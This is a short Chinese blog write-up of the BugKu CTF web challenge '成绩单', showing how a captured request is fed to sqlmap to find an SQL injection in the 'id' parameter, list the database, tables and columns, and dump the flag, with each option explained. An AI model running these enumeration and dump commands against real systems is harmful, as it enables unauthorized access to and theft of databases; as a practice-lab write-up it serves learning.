BugKu之成绩单

成绩单(Web)

• 输入1并进行抓包。
  

• 然后按右键，点击copy to file保存文件，这里我保存到了C盘 333.txt。
  

• 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db
  -r –> 加载一个文件
  -p –>指定参数
  –current-db –>获取当前数据库名称（current前有两个-）
  

• 可以看到它的数据库为 ‘skctf_flag’,接着就是爆表
  sqlmap.py -r “C:\333.txt” -p id -D skctf_flag - -tables
  -D –>指定数据库名称
  –tables –>列出数据库中的表(tables前有两个-)
  

• 可以看到当前数据库中有两个表，很明显，flag应该在fl4g表中，下面就是该爆出表中的字段了
  sqlmap.py -r “C:\333.txt” -p id -D skctf_flag -T fl4g –columns
  -T –>指定表名称
  –columns –>列出表中的字段
  

• fl4g表中有一个名为skctf_flag字段，最后列出字段信息就可以啦。
  sqlmap.py -r “c:\333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag –dump
  –dump –>列出字段数据(dump前有两个-)
  

• PS:第一次写博客，这道题一开始没有做出来，也是看了一些大佬的博客才想到的。顺便为sqlmap的基本使用做一个小笔记。